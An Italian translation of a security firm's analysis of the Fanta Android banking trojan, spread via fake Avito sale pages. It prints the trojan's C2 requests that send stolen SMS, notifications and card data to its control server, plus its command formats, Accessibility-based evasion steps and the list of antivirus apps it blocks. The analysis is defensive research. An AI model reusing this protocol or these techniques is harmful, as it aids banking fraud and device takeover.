Scorra, Fanta: nuova tattica di un vecchio trojan Android

Scorra, Fanta: nuova tattica di un vecchio trojan Android

Una volta vorrete vendere qualcosa su Avito e, dopo aver postato una descrizione dettagliata del vostro prodotto (ad esempio, un modulo di memoria RAM), riceverete questo tipo di messaggio:

Scorra, Fanta: nuova tattica di un vecchio trojan AndroidAprendo il link, vedrete una pagina apparentemente innocua che notifica voi, felici e fortunati venditori, dell'avvenuto acquisto:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Dopo aver premuto il pulsante "Continua", un file APK con un'icona e un nome fidati verrà scaricato sul vostro dispositivo Android. Avete installato un'applicazione che per qualche motivo ha richiesto i permessi di AccessibilityService, poi sono apparse e rapidamente scomparse alcune finestre e... tutto.

Entrate per controllare il saldo, ma la vostra app bancaria per qualche motivo chiede di nuovo i dati della vostra carta. Dopo aver inserito i dati, accade l'orrendo: per qualche motivo a voi ancora oscuro, i soldi iniziano a scomparire dal vostro conto. Cercate di risolvere il problema, ma il vostro telefono resiste: preme da solo i tasti "Indietro" e "Home", non si spegne e non permette di attivare alcun tipo di protezione. Alla fine vi trovate senza denaro, il vostro prodotto non è stato acquistato, siete confusi e vi chiedete: cosa è successo?

La risposta è semplice: siete diventati vittime del trojan Android Fanta, della famiglia Flexnet. Come è potuto succedere? Ora spieghiamo.

Autori: Andrey Polovinkin, specialista junior nell'analisi del codice dannoso, Ivan Pisariev, esperto nell'analisi del codice dannoso.

Un po' di statistiche

La famiglia di trojan Android Flexnet è stata identificata per la prima volta nel 2015. Nel corso del tempo, la famiglia si è espansa in diverse sottofamiglie: Fanta, Limebot, Lipton, ecc. Il trojan, così come l'infrastruttura ad esso correlata, non sta a guardare: vengono sviluppati nuovi ed efficaci schemi di diffusione — nel nostro caso pagine phishing di qualità, mirate a venditori specifici, mentre gli sviluppatori del trojan seguono le tendenze della scrittura di virus — aggiungendo nuove funzionalità che permettono di rubare denaro con maggiore efficacia dai dispositivi infetti e di eludere i meccanismi di protezione.

La campagna descritta in questo articolo è mirata a utenti russi, un numero esiguo di dispositivi infetti è stato registrato in Ucraina, ancora meno in Kazakistan e Bielorussia.

Nonostante Flexnet sia presente da oltre 4 anni nel panorama dei trojan Android ed sia stato studiato in dettaglio da molti ricercatori, è ancora in buona forma. A partire da gennaio 2019, il potenziale danno ammonta a oltre 35 milioni di rubli, solo per le campagne in Russia. Nel 2015, varie versioni di questo trojan Android venivano vendute su forum sotterranei, dove era anche disponibile il codice sorgente del trojan con una descrizione dettagliata. Ciò significa che le statistiche sui danni nel mondo sono ancora più impressionanti. Non è male per un "anziano", vero?

Scorra, Fanta: nuova tattica di un vecchio trojan Android

Dalla vendita alla frode

Come si può vedere dallo screenshot fornito in precedenza della pagina di phishing per il servizio online di annunci Avito, era stata preparata per una vittima specifica. A quanto pare, i malintenzionati utilizzano uno dei parser di Avito, che estrae il numero di telefono e il nome del venditore, oltre alla descrizione del prodotto. Dopo aver aperto la pagina e preparato il file APK, alla vittima viene inviato un messaggio SMS con il suo nome e il link alla pagina di phishing, contenente la descrizione del suo prodotto e l'importo ricevuto dalla "vendita" del prodotto. Cliccando sul pulsante, l'utente riceve un file APK dannoso: Fanta.

L'analisi del dominio shcet491[.]ru ha mostrato che è delegato ai server DNS dell'azienda Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Il file di zona del dominio contiene record che puntano a Indirizzi IP 31.220.23[.]236, 31.220.23[.]243 e 31.220.23[.]235. Tuttavia, il record di risorsa principale del dominio (record A) punta a un server con indirizzo IP 178.132.1[.]240.

L'indirizzo IP 178.132.1[.]240 si trova nei Paesi Bassi ed è di proprietà dell'hosting provider WorldStream. Gli indirizzi IP 31.220.23[.]235, 31.220.23[.]236 e 31.220.23[.]243 si trovano nel Regno Unito e appartengono al server di hosting virtuale HOSTINGER. Come registrar viene utilizzato openprov-ru. Sull'indirizzo IP 178.132.1[.]240 sono state risolte anche le seguenti dominazioni:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Vale la pena notare che quasi tutti i domini avevano link disponibili nel seguente formato:

http://(www.){0,1}/[0-9]{7}

Questo modello include anche il link presente nel messaggio SMS. Dati storici hanno rivelato che a un dominio corrispondeva più di un link secondo il modello descritto sopra, indicando l'utilizzo di un dominio per diffondere il trojan a più vittime.

Andiamo un po' avanti: come server di controllo, il trojan caricato tramite il link del SMS utilizza l'indirizzo onuseseddohap[.]club. Questo dominio è stato registrato il 12 marzo 2019, e a partire dal 29 aprile 2019 si è verificata l'interazione delle applicazioni APK con questo dominio. Basandosi sui dati ottenuti da VirusTotal, un totale di 109 applicazioni hanno interagito con questo server. Il dominio risolveva l'indirizzo IP 217.23.14[.]27, situato nei Paesi Bassi e appartenente a un fornitore di hosting WorldStream. Come registrar viene utilizzato namecheap. A questo indirizzo IP risolto anche domini bad-racoon[.]club (a partire dal 25 settembre 2018) e bad-racoon[.]live (a partire dal 25 ottobre 2018). Con il dominio bad-racoon[.]club hanno interagito oltre 80 file APK, con bad-racoon[.]live — oltre 100.

In generale, il corso dell'attacco si presenta come segue:

Scorra, Fanta: nuova tattica di un vecchio trojan Android

Cosa c'è sotto il cofano di Fanta?

Come molti altri trojan Android, Fanta è in grado di leggere e inviare SMS, effettuare richieste USSD, mostrare le proprie finestre sopra le applicazioni (comprese quelle bancarie). Tuttavia, nel suo arsenale di funzionalità sono state aggiunte nuove capacità: Fanta ha iniziato a utilizzare AccessibilityService per scopi diversi: leggere il contenuto delle notifiche di altre applicazioni, impedire la rilevazione e l'interruzione dell'esecuzione del trojan sul dispositivo infetto, ecc. Fanta funziona su tutte le versioni di Android non inferiori alla 4.4. In questo articolo esamineremo più nel dettaglio il seguente campione di Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediatamente dopo l'avvio

Subito dopo l'avvio, il trojan nasconde la sua icona. Il funzionamento dell'applicazione è possibile solo se il nome del dispositivo infetto non è presente nell'elenco:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Questo controllo viene effettuato nel servizio principale del trojan — MainService. Al primo avvio, avviene l'inizializzazione dei parametri di configurazione dell'applicazione con valori predefiniti (il formato di archiviazione dei dati di configurazione e il loro significato saranno trattati in seguito), nonché la registrazione di un nuovo dispositivo infetto sul server di controllo. Verrà inviato al server una richiesta HTTP POST con il tipo di messaggio register_bot e informazioni sul dispositivo infetto (versione di Android, IMEI, numero di telefono, nome dell'operatore e codice del paese in cui è registrato l'operatore). Come server di controllo si utilizza l'indirizzo hXXp://onuseseddohap[.]club/controller.php. In risposta, il server invia un messaggio che contiene i campi bot_id, bot_pwd, server — questi valori l'applicazione li conserva come parametri del server CnC. Il parametro server è facoltativo, se il campo non è stato ricevuto: Fanta utilizza l'indirizzo di registrazione — hXXp://onuseseddohap[.]club/controller.php. La funzione di modifica dell'indirizzo CnC può essere applicata per risolvere due compiti: distribuzione uniforme del carico tra diversi server (in caso di un numero elevato di dispositivi infetti, il carico su un server web non ottimizzato potrebbe essere elevato), oltre a utilizzare un server alternativo nel caso in cui uno dei server CnC smetta di funzionare.

Se si verifica un errore durante l'invio della richiesta, il trojan ripeterà il processo di registrazione dopo 20 secondi.

Dopo la registrazione riuscita del dispositivo, Fanta mostrerà all'utente il seguente messaggio:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Nota importante: il servizio chiamato Sicurezza del sistema — è il nome del servizio del trojan, e dopo aver cliccato sul pulsante OK si aprirà una finestra con le impostazioni di Accessibilità del dispositivo infetto, dove l'utente deve concedere i diritti di Accessibilità per il servizio malevolo:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Una volta che l'utente attiva AccessibilityService, Fanta ottiene accesso al contenuto delle finestre delle applicazioni e alle azioni eseguite in esse:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Subito dopo aver ottenuto i diritti di Accessibilità, il trojan richiede i diritti di amministratore e i diritti per leggere le notifiche:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Utilizzando AccessibilityService, l'applicazione simula la pressione dei tasti, concedendosi così tutti i diritti necessari.

Fanta crea diverse istanze di database (che saranno descritte in seguito), necessarie per memorizzare i dati di configurazione e anche le informazioni raccolte durante il processo sul dispositivo infetto. Per inviare le informazioni raccolte, il trojan crea un'attività ricorrente destinata a estrarre i campi dal database e ricevere un comando dal server di controllo. L'intervallo di accesso al CnC è impostato a seconda della versione di Android: nel caso di 5.1 l'intervallo sarà di 10 secondi, altrimenti 60 secondi.

Per ricevere un comando, Fanta effettua una richiesta GetTask al server di controllo. In risposta, il CnC può inviare uno dei seguenti comandi:

TeamDescrizione
0Inviare un messaggio SMS
1Effettuare una telefonata o un comando USSD
2Aggiornare il parametro intervallo
3Aggiornare il parametro intercept
6Aggiornare il parametro smsManager
9Iniziare a raccogliere messaggi SMS
11Ripristinare il telefono alle impostazioni di fabbrica
12Attivazione/Disattivazione della registrazione della creazione di finestre di dialogo

Fanta raccoglie anche notifiche da 70 applicazioni bancarie, sistemi di pagamento veloce e portafogli elettronici, e le salva nel database.

Memorizzazione dei parametri di configurazione

Per la memorizzazione dei parametri di configurazione, Fanta utilizza un approccio standard per la piattaforma Android — Preferences-file. Le impostazioni saranno salvate in un file chiamato settings. La descrizione dei parametri salvati si trova nella tabella sottostante.

NomeValore predefinitoValori possibiliDescrizione
id0InteroIdentificatore del bot
serverhXXp://onuseseddohap[.]club/URLIndirizzo del server di gestione
pwdStringPassword per il server
intervallo20InteroIntervallo di tempo. Indica quanto tempo bisogna ritardare l'esecuzione delle attività successive:
  • Quando si invia una richiesta di stato del messaggio SMS inviato
  • Ricezione di un nuovo comando dal server di gestione

interceptallall/telNumberSe il campo è uguale alla stringa all o telNumber, il messaggio SMS ricevuto sarà intercettato dall'app e non mostrato all'utente.
smsManager00/1Attivazione/Disattivazione dell'app come destinatario predefinito degli SMS
readDialogfalseVero/FalsoAttivazione/Disattivazione della registrazione degli eventi AccessibilityEvent

Fanta utilizza anche il file smsManager:

NomeValore predefinitoValori possibiliDescrizione
pckgStringNome del gestore degli SMS utilizzato

Interazione con i database

Durante il suo funzionamento, il trojan utilizza due database. Il database chiamato a viene utilizzato per memorizzare varie informazioni raccolte dal telefono. Il secondo database si chiama fanta.db e viene utilizzato per memorizzare le impostazioni responsabili della creazione di finestre di phishing destinate a raccogliere informazioni sulle carte bancarie.

Il trojan utilizza il database e per memorizzare le informazioni raccolte e registrare le sue azioni. I dati sono memorizzati nella tabella logs. Per creare la tabella viene utilizzata la seguente query SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Il database contiene le seguenti informazioni:

1. Registrazione dell'accensione del dispositivo infetto con il messaggio Il telefono è stato acceso!

2. Notifiche dalle applicazioni. Il messaggio viene formulato secondo il seguente schema:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Dati delle carte bancarie dai moduli di phishing creati dal trojan. Il parametro VIEW_NAME può essere uno dei seguenti:

  • AliExpress
  • Avito
  • Google Play
  • Varie <%App Name%>

Il messaggio è registrato nel formato:

[](<%VIEW_NAME%>) Numero della carta:<RD_NUMBER%>; Data:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Messaggi SMS in entrata/uscita nel formato:

([] Tipo: In entrata/In uscita) :

5. Informazioni sul pacchetto che crea la finestra di dialogo nel formato:

()

Esempio di tabella logs:

Scorra, Fanta: nuova tattica di un vecchio trojan Android
Una delle funzionalità di Fanta è la raccolta di informazioni sulle carte bancarie. La raccolta dei dati avviene grazie alla creazione di finestre di phishing all'apertura delle applicazioni bancarie. Il trojan crea una finestra di phishing solo una volta. Le informazioni su quando la finestra è stata mostrata all'utente vengono memorizzate in tabella settings nel database fanta.db. Per creare un database si utilizza la seguente query SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tutti i campi della tabella settings sono inizializzati per impostazione predefinita con valore 1 (crea finestra di phishing). Dopo che l'utente inserisce i propri dati, il valore sarà impostato su 0. Esempio di campi della tabella settings:

  • can_login — il campo gestisce la visualizzazione del modulo all'apertura dell'applicazione bancaria
  • first_bank — non utilizzato
  • can_avito — il campo gestisce la visualizzazione del modulo all'apertura dell'applicazione Avito
  • can_ali — il campo gestisce la visualizzazione del modulo all'apertura dell'applicazione Aliexpress
  • can_another — il campo gestisce la visualizzazione del modulo all'apertura di qualsiasi applicazione dell'elenco: Yula, Pandao, Drom Avto, Portafoglio. Carte sconto e bonus, Aviasales, Booking, Trivago
  • can_card — il campo gestisce la visualizzazione del modulo all'apertura Google Play

Interazione con il server di controllo

L'interazione di rete con il server di controllo avviene tramite il protocollo HTTP. Per lavorare con la rete, Fanta utilizza la popolare libreria Retrofit. Le richieste vengono inviate all'indirizzo hXXp://onuseseddohap[.]club/controller.php. L'indirizzo del server può essere modificato durante la registrazione al server. Dalla risposta del server possono arrivare cookie. Fanta esegue le seguenti richieste al server:

  • La registrazione del bot sul server di controllo avviene una sola volta alla prima esecuzione. Vengono inviati al server i seguenti dati sul dispositivo infetto:
    · Cookie — cookie ricevuti dal server (valore predefinito — stringa vuota)
    · modalità — costante di stringa register_bot
    · prefix — costante intera 2
    · version_sdk — formato secondo il seguente schema: /(Avit)
    · imei — IMEI del dispositivo infetto
    · country — codice del paese in cui è registrato l'operatore, in formato ISO
    · number — numero di telefono
    · operatore — nome dell'operatore

    Esempio di richiesta inviata al server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=
    

    In risposta alla richiesta, il server deve restituire un oggetto JSON contenente i seguenti parametri:
    · bot_id — identificatore del dispositivo infetto. Se bot_id è uguale a 0, Fanta ripeterà la richiesta.
    · bot_pwd — password per il server.
    · server — indirizzo del server di gestione. Parametro facoltativo. Se il parametro non è specificato, verrà utilizzato l'indirizzo memorizzato nell'applicazione.

    Esempio di oggetto JSON:

    {
        "response":[
       	 {
       		 "bot_id": ,
       		 "bot_pwd": ,
       		 "server": 
       	 }
        ],
        "status":"ok"
    }

  • Richiesta per ricevere un comando dal server. Al server vengono inviati i seguenti dati:
    · Cookie — cookie ricevuti dal server
    · bid — id del dispositivo infetto, ottenuto con l'invio della richiesta register_bot
    · pwd —password per il server
    · divice_admin — campo che indica se sono stati ottenuti diritti di amministratore. Se i diritti di amministratore sono stati ottenuti, il campo è uguale a 1, altrimenti 0
    · Accessibility — stato di funzionamento del servizio Accessibility. Se il servizio è stato avviato, il valore è uguale a 1, altrimenti 0
    · SMSManager — indica se il trojan è attivato come applicazione predefinita per ricevere SMS
    · screen — mostra in quale stato si trova lo schermo. Viene impostato il valore 1, se lo schermo è acceso, altrimenti 0;

    Esempio di richiesta inviata al server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<V_ADM%>&Accessibility=<CSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    A seconda del comando, il server può restituire un oggetto JSON con parametri diversi:

    · Team Inviare un messaggio SMS: Nei parametri è incluso il numero di telefono, il testo del messaggio SMS e l'identificatore del messaggio inviato. L'identificatore è utilizzato quando si invia il messaggio al server con tipo setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": ,
       		 "sms_text": ,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Team Effettuare una telefonata o un comando USSD: Il numero di telefono o il comando arriva nel corpo della risposta.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": 
       	 }
        ],
        "status":"ok"
    }

    · Team Cambia il parametro interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": 
       	 }
        ],
        "status":"ok"
    }

    · Team Modifica il parametro intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Team Modifica il campo SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Team Esegui il caricamento dei messaggi SMS dal dispositivo infetto.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Team Ripristinare il telefono alle impostazioni di fabbrica:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Team Modifica il parametro ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Invio del messaggio di tipo setSmsStatus. Questa richiesta viene eseguita dopo l'esecuzione del comando Inviare un messaggio SMS. La richiesta appare come segue:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=&status_sms=

  • Invio del contenuto del database. Con una sola richiesta viene inviata una riga. I seguenti dati vengono inviati al server:
    · Cookie — cookie ricevuti dal server
    · modalità — costante di stringa setSaveInboxSms
    · bid — id del dispositivo infetto, ottenuto con l'invio della richiesta register_bot
    · text — testo nella riga attuale del DB (campo d dalla tabella logs nel database e)
    · number — nome della riga attuale del DB (campo p dalla tabella logs nel database e)
    · sms_mode — valore intero (campo m dalla tabella logs nel database e)

    La richiesta appare come segue:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=&text=&number=&sms_mode=

    In caso di invio riuscito al server, la riga verrà rimossa dalla tabella. Esempio di oggetto JSON restituito dal server:

    {
        "response":[],
        "status":"ok"
    }

Interazione con AccessibilityService

AccessibilityService è stato implementato per facilitare l'uso dei dispositivi Android da parte di persone con disabilità. Nella maggior parte dei casi, è necessaria un'interazione fisica per interagire con l'applicazione. AccessibilityService consente di fare questo in modo programmatico. Fanta utilizza il servizio per creare finestre false nelle applicazioni bancarie e impedire l'apertura delle impostazioni di sistema e di alcune applicazioni.

Utilizzando le funzionalità di AccessibilityService, il trojan monitora le modifiche degli elementi sullo schermo del dispositivo infetto. Come già descritto in precedenza, nelle impostazioni di Fanta c'è un parametro che regola il logging delle operazioni con le finestre di dialogo — readDialog. Se questo parametro è attivato, verranno aggiunte al database informazioni sul nome e sulla descrizione del pacchetto che ha innescato l'evento. Il trojan esegue le seguenti azioni quando si verificano eventi:

  • Imita la pressione dei tasti indietro e home nel caso in cui:
    · se l'utente desidera riavviare il proprio dispositivo
    · se l'utente vuole disinstallare l'app 'Avito' o modificare i diritti di accesso
    · se nella pagina c'è un riferimento all'app 'Avito'
    · quando si apre l'app 'Google Play Protect'
    · quando si aprono le pagine delle impostazioni AccessibilityService
    · in caso di dialogo 'Sicurezza del sistema'
    · quando si apre la pagina delle impostazioni 'Draw over other app'
    · quando si apre la pagina 'App', 'Ripristino e reset', 'Ripristino dati', 'Ripristino impostazioni', 'Pannello sviluppatori', 'Accessibilità', 'Funzionalità speciali', 'Permessi speciali'
    · se l'evento è stato generato da determinate applicazioni.

    Elenco delle applicazioni

    • android
    • Master Lite
    • Clean Master
    • Clean Master per CPU x86
    • Gestione dei permessi delle applicazioni Meizu
    • MIUI Sicurezza
    • Clean Master — Antivirus & Pulizia di cache e spazzatura
    • Controllo genitori e GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Sicurezza Web Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Sicurezza Mobile Antivirus PRO
    • Avast antivirus & protezione gratuita 2019
    • Sicurezza Mobile MegaFon
    • AVG Protection per Xperia
    • Sicurezza Mobile
    • Malwarebytes antivirus & protezione
    • Antivirus per Android 2019
    • Security Master — Antivirus, VPN, AppLock, Booster
    • AVG antivirus per tablet Huawei System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Centro di Controllo Mobile
    • Dr.Web Security Space Life
    • Dr.Web Centro di Controllo Mobile
    • Antivirus & Sicurezza Mobile
    • Kaspersky Internet Security: Antivirus e Protezione
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security — protezione e gestione
    • AVG Antivirus gratuito 2019 – Protezione per Android
    • Antivirus Android
    • Norton Mobile Security e Antivirus
    • Antivirus, firewall, VPN, sicurezza mobile
    • Sicurezza Mobile: antivirus, VPN, protezione contro le frodi
    • Antivirus per Android

  • Se durante l'invio di un SMS a un numero breve viene richiesta un'autorizzazione, Fanta imita la pressione della casella di controllo Ricorda la scelta e il pulsante invia.
  • Nel tentativo di rimuovere i diritti di amministratore dal trojan blocca lo schermo del telefono.
  • Impedisce l'aggiunta di nuovi amministratori.
  • Nel caso in cui l'app antivirus dr.web abbia rilevato una minaccia, Fanta imita la pressione del pulsante ignora.
  • Il trojan imita la pressione dei tasti indietro e home, se l'evento è stato generato dall'applicazione Samsung Device Care.
  • Fanta crea finestre di phishing con moduli per l'inserimento delle informazioni sulle carte di credito, se è stata avviata un'applicazione da un elenco che include circa 30 diversi servizi Internet. Tra questi: AliExpress, Booking, Avito, Componente Google Play Market, Pandao, Drom Auto e altri.

    Moduli di phishing

    Fanta analizza quali applicazioni vengono eseguite sul dispositivo infettato. Se è stata aperta l'applicazione di interesse, il trojan mostra una finestra di phishing sopra tutte le altre, che consiste in un modulo per l'inserimento delle informazioni sulla carta di credito. L'utente deve inserire i seguenti dati:

    • Numero della carta
    • Data di scadenza della carta
    • CVV
    • Nome del titolare della carta (non per tutte le banche)

    A seconda dell'applicazione avviata, verranno mostrate diverse finestre di phishing. Di seguito sono riportati esempi di alcune di esse:

    Aliexpress:

    Scorra, Fanta: nuova tattica di un vecchio trojan Android
    Avito:

    Scorra, Fanta: nuova tattica di un vecchio trojan Android
    Per alcune altre applicazioni, ad esempio Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Scorra, Fanta: nuova tattica di un vecchio trojan Android

    Come sono andate realmente le cose

    Fortunatamente, la persona che ha ricevuto il messaggio SMS descritto all'inizio dell'articolo era un esperto di sicurezza informatica. Pertanto, la versione reale, non da regista, differisce da quella raccontata in precedenza: la persona ha ricevuto un SMS interessante, dopo di che lo ha inoltrato al team di Group-IB Threat Hunting Intelligence. Il risultato dell'attacco è questo articolo. Una conclusione felice, vero? Tuttavia, non tutte le storie si concludono così bene, e per evitare che la tua somigli a una versione da regista con la perdita di denaro, nella maggior parte dei casi è sufficiente attenersi alle seguenti regole, già da tempo descritte:

    • non installare applicazioni per dispositivi mobili con sistema operativo Android da fonti diverse da Google Play
    • prestare particolare attenzione ai permessi richiesti dall'app durante l'installazione
    • fare attenzione alle estensioni dei file scaricati
    • installare regolarmente gli aggiornamenti del sistema operativo Android
    • non visitare risorse sospette e non scaricare file da esse
    • non cliccare sui link ricevuti nei messaggi SMS.

Fonte: habr.com

Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server 🔥 Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server | ProHoster